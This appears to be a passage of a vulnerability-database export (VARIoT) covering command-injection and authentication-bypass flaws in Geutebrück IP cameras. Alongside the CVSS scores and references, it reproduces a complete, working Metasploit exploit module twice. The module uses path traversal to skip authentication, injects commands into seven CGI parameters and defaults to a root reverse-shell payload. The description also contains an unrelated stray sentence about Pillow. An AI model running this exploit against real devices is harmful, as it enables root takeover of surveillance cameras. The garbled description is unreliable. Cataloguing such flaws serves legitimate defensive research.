"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2021-002023",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-33548",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "info@cert.vde.com",
"id": "CVE-2021-33548",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "OTHER",
"id": "JVNDB-2021-002023",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202107-2089",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2089"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33548"
},
{
"db": "NVD",
"id": "CVE-2021-33548"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 \u2025 * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 \u2025 * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 \u2025 * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 \u2025 * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n Rank = ExcellentRanking\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n \u0027Name\u0027 =\u003e \u0027Geutebruck Multiple Remote Command Execution\u0027,\n \u0027Description\u0027 =\u003e %q{\n This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n and exploits multiple authenticated arbitrary command execution vulnerabilities within\n the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions \u003c= 1.12.0.27 as\n well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n remote code execution as the root user. \n },\n\n \u0027Author\u0027 =\u003e [\n \u0027Titouan Lazard\u0027, # Of RandoriSec - Discovery\n \u0027Ibrahim Ayadhi\u0027, # Of RandoriSec - Discovery and Metasploit Module\n \u0027S\u00e9bastien Charbonnier\u0027 # Of RandoriSec - Metasploit Module\n ],\n \u0027License\u0027 =\u003e MSF_LICENSE,\n \u0027References\u0027 =\u003e [\n [\u0027CVE\u0027, \u00272021-33543\u0027],\n [\u0027CVE\u0027, \u00272021-33544\u0027],\n [\u0027CVE\u0027, \u00272021-33548\u0027],\n [\u0027CVE\u0027, \u00272021-33550\u0027],\n [\u0027CVE\u0027, \u00272021-33551\u0027],\n [\u0027CVE\u0027, \u00272021-33552\u0027],\n [\u0027CVE\u0027, \u00272021-33553\u0027],\n [\u0027CVE\u0027, \u00272021-33554\u0027],\n [ \u0027URL\u0027, \u0027http://geutebruck.com\u0027 ],\n [ \u0027URL\u0027, \u0027https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],\n [ \u0027URL\u0027, \u0027https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]\n ],\n \u0027DisclosureDate\u0027 =\u003e \u00272021-07-08\u0027,\n \u0027Privileged\u0027 =\u003e true,\n \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n \u0027Arch\u0027 =\u003e [ARCH_CMD],\n \u0027Targets\u0027 =\u003e [\n [\n \u0027CVE-2021-33544 - certmngr.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027createselfcert\u0027,\n \u0027local\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027country\u0027 =\u003e Rex::Text.rand_text_alphanumeric(2),\n \u0027state\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027,\n \u0027organization\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027organizationunit\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027commonname\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027days\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n \u0027type\u0027 =\u003e Rex::Text.rand_text_numeric(2..4)\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/certmngr.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33548 - factory.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027preserve\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/factory.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33550 - language.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/language.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33551 - oem.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027set\u0027,\n \u0027enable\u0027 =\u003e \u0027yes\u0027,\n \u0027environment.lang\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/oem.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33552 - simple_reclistjs.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027get\u0027,\n \u0027timekey\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/simple_reclistjs.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33553 - testcmd.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027command\u0027 =\u003e \u0027PLACEHOLDER_CMD\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/testcmd.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33554 - tmpapp.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027appfile.filename\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/tmpapp.cgi\u0027\n }\n ]\n ],\n \u0027DefaultTarget\u0027 =\u003e 0,\n \u0027DefaultOptions\u0027 =\u003e {\n \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n },\n \u0027Notes\u0027 =\u003e {\n \u0027Stability\u0027 =\u003e [\u0027CRASH_SAFE\u0027],\n \u0027Reliability\u0027 =\u003e [\u0027REPEATABLE_SESSION\u0027],\n \u0027SideEffects\u0027 =\u003e [\u0027ARTIFACTS_ON_DISK\u0027]\n }\n )\n )\n end\n\n def firmware\n res = send_request_cgi(\n \u0027method\u0027 =\u003e \u0027GET\u0027,\n \u0027uri\u0027 =\u003e \u0027/brand.xml\u0027\n )\n unless res\n print_error(\u0027Connection failed!\u0027)\n return false\n end\n\n unless res\u0026.body \u0026\u0026 !res.body.empty?\n print_error(\u0027Empty body in the response!\u0027)\n return false\n end\n\n res_xml = res.get_xml_document\n if res_xml.at(\u0027//firmware\u0027).nil?\n print_error(\u0027Target did not respond with a XML document containing the \"firmware\" element!\u0027)\n return false\n end\n raw_text = res_xml.at(\u0027//firmware\u0027).text\n if raw_text \u0026\u0026 raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n else\n print_error(\u0027Target responded with a XML document containing the \"firmware\" element but its not a valid version string!\u0027)\n false\n end\n end\n\n def check\n version = firmware\n if version == false\n return CheckCode::Unknown(\u0027Target did not respond with a valid XML response that we could retrieve the version from!\u0027)\n end\n\n rex_version = Rex::Version.new(version)\n vprint_status(\"Found Geutebruck version #{rex_version}\")\n if rex_version \u003c= Rex::Version.new(\u00271.12.0.27\u0027) || rex_version == Rex::Version.new(\u00271.12.13.2\u0027) || rex_version == Rex::Version.new(\u00271.12.14.5\u0027)\n return CheckCode::Appears\n end\n\n CheckCode::Safe\n end\n\n def exploit\n print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n method = target[\u0027http_method\u0027]\n if method == \u0027GET\u0027\n http_method_vars = \u0027vars_get\u0027\n else\n http_method_vars = \u0027vars_post\u0027\n end\n\n http_vars = target[\u0027http_vars\u0027]\n http_vars.each do |(k, v)|\n if v.include? \u0027PLACEHOLDER_CMD\u0027\n http_vars[k][\u0027PLACEHOLDER_CMD\u0027] = payload.encoded\n end\n end\n\n print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n send_request_cgi(\n {\n \u0027method\u0027 =\u003e method,\n \u0027uri\u0027 =\u003e target[\u0027uri\u0027],\n http_method_vars =\u003e http_vars\n }\n )\n print_status(\u0027Exploit complete, you should get a shell as the root user!\u0027)\n end\nend\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33548"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "VULMON",
"id": "CVE-2021-33548"
},
{
"db": "PACKETSTORM",
"id": "164036"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-33548",
"trust": 2.7
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-03",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "164036",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU97817785",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-05",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023",
"trust": 0.8
},
{
"db": "CXSECURITY",
"id": "WLB-2021090031",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021072807",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2550",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2089",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021041363",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-33548",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33548"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2089"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33548"
}
]
},
"id": "VAR-202109-0857",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"camera device"
],
"sub_category": "camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T22:14:46.195000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
"trust": 0.8,
"url": "https://portal.geutebrueck.com/"
},
{
"title": "Multiple Geutebr\u00fcck Repair measures for camera device command injection vulnerability",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=158069"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2089"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "Command injection (CWE-77) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33548"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
},
{
"trust": 1.6,
"url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu97817785/"
},
{
"trust": 0.8,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
},
{
"trust": 0.7,
"url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/issue/wlb-2021090031"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
},
{
"trust": 0.1,
"url": "https://github.com/rapid7/metasploit-framework"
},
{
"trust": 0.1,
"url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
},
{
"trust": 0.1,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
},
{
"trust": 0.1,
"url": "https://metasploit.com/download"
},
{
"trust": 0.1,
"url": "http://geutebruck.com\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33548"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2089"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33548"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33548"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2089"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33548"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2021-09-02T15:36:40",
"db": "PACKETSTORM",
"id": "164036"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2089"
},
{
"date": "2021-04-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2021-09-13T18:15:22.657000",
"db": "NVD",
"id": "CVE-2021-33548"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-29T08:30:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2022-10-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2089"
},
{
"date": "2021-04-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2023-11-07T03:35:51.757000",
"db": "NVD",
"id": "CVE-2021-33548"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2089"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202107-2089"
}
],
"trust": 0.6
}
}
VAR-202109-0848
Vulnerability from variot - Updated: 2025-01-30 21:38Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 ‥ * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 ‥ * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 ‥ * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##
This module requires Metasploit: https://metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. },
'Author' => [
'Titouan Lazard', # Of RandoriSec - Discovery
'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2021-33543'],
['CVE', '2021-33544'],
['CVE', '2021-33548'],
['CVE', '2021-33550'],
['CVE', '2021-33551'],
['CVE', '2021-33552'],
['CVE', '2021-33553'],
['CVE', '2021-33554'],
[ 'URL', 'http://geutebruck.com' ],
[ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
[ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
],
'DisclosureDate' => '2021-07-08',
'Privileged' => true,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD],
'Targets' => [
[
'CVE-2021-33544 - certmngr.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'createselfcert',
'local' => Rex::Text.rand_text_alphanumeric(10..16),
'country' => Rex::Text.rand_text_alphanumeric(2),
'state' => '$(PLACEHOLDER_CMD)',
'organization' => Rex::Text.rand_text_alphanumeric(10..16),
'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
'days' => Rex::Text.rand_text_numeric(2..4),
'type' => Rex::Text.rand_text_numeric(2..4)
},
'uri' => '/../uapi-cgi/certmngr.cgi'
}
],
[
'CVE-2021-33548 - factory.cgi', {
'http_method' => 'GET',
'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/factory.cgi'
}
],
[
'CVE-2021-33550 - language.cgi', {
'http_method' => 'GET',
'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/language.cgi'
}
],
[
'CVE-2021-33551 - oem.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'set',
'enable' => 'yes',
'environment.lang' => '$(PLACEHOLDER_CMD)'
},
'uri' => '/../uapi-cgi/oem.cgi'
}
],
[
'CVE-2021-33552 - simple_reclistjs.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'get',
'timekey' => Rex::Text.rand_text_numeric(2..4),
'date' => '$(PLACEHOLDER_CMD)'
},
'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
}
],
[
'CVE-2021-33553 - testcmd.cgi', {
'http_method' => 'GET',
'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
'uri' => '/../uapi-cgi/testcmd.cgi'
}
],
[
'CVE-2021-33554 - tmpapp.cgi', {
'http_method' => 'GET',
'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/tmpapp.cgi'
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
},
'Notes' => {
'Stability' => ['CRASH_SAFE'],
'Reliability' => ['REPEATABLE_SESSION'],
'SideEffects' => ['ARTIFACTS_ON_DISK']
}
)
)
end
def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end
unless res&.body && !res.body.empty?
print_error('Empty body in the response!')
return false
end
res_xml = res.get_xml_document
if res_xml.at('//firmware').nil?
print_error('Target did not respond with a XML document containing the "firmware" element!')
return false
end
raw_text = res_xml.at('//firmware').text
if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
else
print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
false
end
end
def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end
rex_version = Rex::Version.new(version)
vprint_status("Found Geutebruck version #{rex_version}")
if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
return CheckCode::Appears
end
CheckCode::Safe
end
def exploit print_status("#{rhost}:#{rport} - Setting up request...")
method = target['http_method']
if method == 'GET'
http_method_vars = 'vars_get'
else
http_method_vars = 'vars_post'
end
http_vars = target['http_vars']
http_vars.each do |(k, v)|
if v.include? 'PLACEHOLDER_CMD'
http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
end
end
print_status("Sending CMD injection request to #{rhost}:#{rport}")
send_request_cgi(
{
'method' => method,
'uri' => target['uri'],
http_method_vars => http_vars
}
)
print_status('Exploit complete, you should get a shell as the root user!')
end end
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202109-0848",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
